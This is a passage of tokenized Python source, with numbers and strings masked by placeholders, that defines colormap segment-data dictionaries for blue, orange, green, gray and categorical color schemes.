<NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Bu7_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuOr12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , 
<NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuGr14_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _BuDRd18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuDOr18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) 
, <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuOr8_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _Cat12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) 
, <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuGy8_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BuOrR14_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( 